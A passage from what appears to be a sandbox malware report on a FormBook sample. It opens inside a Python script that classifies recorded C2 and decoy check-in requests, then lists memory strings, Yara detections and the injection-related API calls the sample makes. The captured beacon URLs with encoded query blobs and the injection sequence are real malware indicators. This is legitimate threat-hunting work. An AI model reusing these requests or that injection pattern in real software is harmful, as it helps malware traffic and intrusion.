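    ("www.investmentpartners.limited", "/hx3a/?yvLp6=brq1n3aPok8cFP+QyTVVGry8TF4KLIKYulSDbrE0IIbdXAl5b54voPCnFdnaruz10AJ9JKXZsg==&6l=t8eTzfA8rB7py"),
    ("www.stacksyspro.net", "/hx3a/?6l=t8eTzfA8rB7py&yvLp6=gkm2pEh8KEmpulawdvJ1V43zAdeU214KS2HTFZoK2O2SsOEqfkF7FZJwvCYR1UF8Rs6N914p1Q=="),
    ("www.aksharnewtown.com", "/hx3a/?yvLp6=UKCdSLR+lyrQbbbCP2MhlUsk7yfSGMFZEurQt1OYEDE1Z8eZbIDIkuaz0L4nWes64WGYrYxAqg==&6l=t8eTzfA8rB7py"),
    ("www.tonton-koubou.com", "/hx3a/?6l=t8eTzfA8rB7py&yvLp6=vULSFbXUfWqfH/UQKANXmh//LRVD9fF+bm7wgJ2FfsCiVE70xyhWGRMHpQ9kpTkv8g1Bmau5WA=="),
    ("www.formula-kuhni.com", "/hx3a/?yvLp6=caEAE6TOQuxSMBR5BS8nf+GDaIfP+W5I+A7g/UPOg7+JEug9q1NgoLt4ZSWomvYtgt6I+7SvKg==&6l=t8eTzfA8rB7py"),
    ("www.xn--ol-xia.com", "/hx3a/?yvLp6=o+3wYjNifdE6FKE0bOiznyo8jGn7vjVVrJpNZHKkq7PaCapngpRQoMcVskl66UoDGo5EztP+UQ==&6l=t8eTzfA8rB7py"),
    ("www.ugonget.com", "/hx3a/?6l=t8eTzfA8rB7py&yvLp6=qBahC4CKT3yOn5twSoz5N4YsmdYqg0jdF6L89PfdPPedh7rnw+4FXiJe9HO6V7yUZIpJ8/Yz5A=="),
    ("www.jabberjawmobile.com", "/hx3a/?yvLp6=cNQmpavEJfLRVSDxdHUFAARwayWBvklnexOaeKif2gi+yGNN3QCAF1RUuDonfjyO2vX8uvakBQ==&6l=t8eTzfA8rB7py"),
    ("www.yakudatsu-hikaku.com", "/hx3a/?6l=t8eTzfA8rB7py&yvLp6=tI3SrGzIvW6pivz42JGLXvW3gzDpE2zUYLW8n1w7wouCbacCZl2dqvUI+ajsT2GFRHOaP55G6g=="),
]

B64_RE = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")   # the long variable blob
TOKEN_RE = re.compile(r"^[A-Za-z0-9]{8,20}$")         # the short constant value


def load_config() -> dict:
    return json.loads(CONFIG_JSON)


def strip_www(host: str) -> str:
    host = host.lower()
    return host[4:] if host.startswith("www.") else host


def host_class(host: str, cfg: dict) -> str:
    """'c2' for the configured C2 host, 'decoy' for a configured decoy, else 'unknown'."""
    h = strip_www(host)
    if h in {strip_www(u.split("/", 1)[0]) for u in cfg["C2 list"]}:
        return "c2"
    if h in {d.lower() for d in cfg["decoy"]}:
        return "decoy"
    return "unknown"


def c2_paths(cfg: dict) -> Set[str]:
    return {"/" + u.split("/", 1)[1] for u in cfg["C2 list"] if "/" in u}


def parse_request(host: str, target: str, cfg: dict) -> dict:
    path, _, query = target.partition("?")
    # Split the raw query by hand: parse_qs would turn the '+' inside the base64 blob into a space.
    params = dict(p.split("=", 1) for p in query.split("&") if "=" in p)
    fixed: Optional[str] = None
    blob: Optional[str] = None
    for value in params.values():          # parameter order differs between requests
        if B64_RE.match(value):
            blob = value
        elif TOKEN_RE.match(value):
            fixed = value
    return {
        "host": host,
        "host_class": host_class(host, cfg),
        "path_in_config": path in c2_paths(cfg),
        "fixed_token": fixed,
        "blob_bytes": len(base64.b64decode(blob)) if blob else None,
    }


def analyse(requests: Optional[List[Tuple[str, str]]] = None, cfg: Optional[dict] = None) -> List[dict]:
    cfg = cfg or load_config()
    return [parse_request(h, t, cfg) for h, t in (requests or REQUESTS)]


def pivot(records: List[dict]) -> Dict[str, Set[str]]:
    """Hosts grouped by the constant token; one token across many hosts is the hunting pivot."""
    out: Dict[str, Set[str]] = {}
    for r in records:
        if r["fixed_token"]:
            out.setdefault(r["fixed_token"], set()).add(r["host"])
    return out


if __name__ == "__main__":
    recs = analyse()
    for r in recs:
        print(f"{r['host']:32} {r['host_class']:8} path={r['path_in_config']} blob={r['blob_bytes']}B")
    for token, hosts in pivot(recs).items():
        print(f"token {token} seen with {len(hosts)} hosts")
```

Every recorded request goes to a configured decoy and none to the configured C2 host, so a blocklist built from the C2 entry alone would have matched nothing in this capture, while the path, the constant token and the bare request headers (Host and Connection only, no User-Agent, matching the "HTTP GET or POST without a user agent" signature) are shared by all eleven. The three ET TROJAN FormBook CnC Checkin Snort alerts above fired on exactly this request shape rather than on the destination.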
Source: explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000002.603524845.000000000095C000.00000004.00000020.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: cscript.exe, 00000003.00000002.605431320.00000000050D2000.00000004.00000001.sdmp | String found in binary or memory: https://www.yakudatsu-hikaku.com/hx3a/?6l=t8eTzfA8rB7py&yvLp6=tI3SrGzIvW6pivz42JGLXvW3gzDpE2zUYLW8n1
Source: C:\Users\user\Desktop\4oItdZkNOZ.exe | Code function: 0_2_00404EA0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

Yara detected FormBook
Source: Yara match | the same 7 memory dumps and 6 unpacked PEs listed under AV Detection above

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000003.00000002.604139164.0000000002B50000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.604139164.0000000002B50000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.603084616.0000000000300000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.603084616.0000000000300000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.388146852.00000000009F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.388146852.00000000009F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.350827650.00000000026A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.350827650.00000000026A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.345961312.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.345961312.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.387799349.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.387799349.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.387989609.00000000006A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.387989609.00000000006A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.4oItdZkNOZ.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.4oItdZkNOZ.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.4oItdZkNOZ.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.4oItdZkNOZ.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.4oItdZkNOZ.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.4oItdZkNOZ.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.4oItdZkNOZ.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.4oItdZkNOZ.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.4oItdZkNOZ.exe.26a0000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.4oItdZkNOZ.exe.26a0000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.4oItdZkNOZ.exe.26a0000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.4oItdZkNOZ.exe.26a0000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_004181C0 NtCreateFile,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00418270 NtReadFile,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_004182F0 NtClose,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_004182EA NtClose,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_0041839A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B798F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B79860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B79840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B799A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B79910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B79A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B79A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B79A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B795D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B79540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B796E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B79660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B797A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B79780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B79FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B79710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B798A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B79820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B7B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B799D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B79950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B79A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B79A10 NtQuerySection,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B7A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B79B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B795F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B7AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B79520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B79560 NtWriteFile,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B796D0 NtCreateKey,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B79610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B79670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B79650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B79730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B7A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B79770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B7A770 NtOpenThread,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B79760 NtOpenProcess,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_1_004181C0 NtCreateFile,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_1_00418270 NtReadFile,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_1_004182F0 NtClose,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_1_004183A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A895D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A89540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A896E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A896D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A89660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A89650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A89780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A89FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A89710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A89860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A89840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A899A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A89910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A89A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A895F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A89520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A8AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A89560 NtWriteFile,
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A89610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A89670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A897A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A89730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A8A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A89760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A8A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A89770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A898A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A898F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A89820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A8B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A899D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A89950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A89A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A89A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A89A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A89A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A8A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A89B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_02B682F0 NtClose,
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_02B68270 NtReadFile,
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_02B683A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_02B681C0 NtCreateFile,
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_02B682EA NtClose,
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_02B6839A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 0_2_0040314A EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 0_2_004046A7
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_0040102C
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00401030
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_0041B881
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_0041C10F
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_0041A2A6
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_0041BC41
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00408C5C
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00408C60
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00402D90
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_0041CEF6
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B620A0
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B4B090
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00C028EC
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00C020A8
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00BF1002
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00C0E824
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B54120
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B3F900
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00C022AE
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00BEFA2B
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B6EBB0
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00BF03DA
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00BFDBD2
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00C02B28
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B5AB40
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B4841F
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00BFD466
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00C025DD
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B62581
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B4D5E0
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B30D20
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00C01D55
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00C02D07
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00C02EF7
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00B56E30
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00BFD616
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00C0DFCE
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 1_2_00C01FF1
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A5841F
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B0D466
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A72581
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A5D5E0
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B125DD
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A40D20
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B12D07
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B11D55
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B12EF7
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A66E30
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B0D616
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B11FF1
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B1DFCE
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A720A0
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B120A8
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A5B090
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B128EC
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B1E824
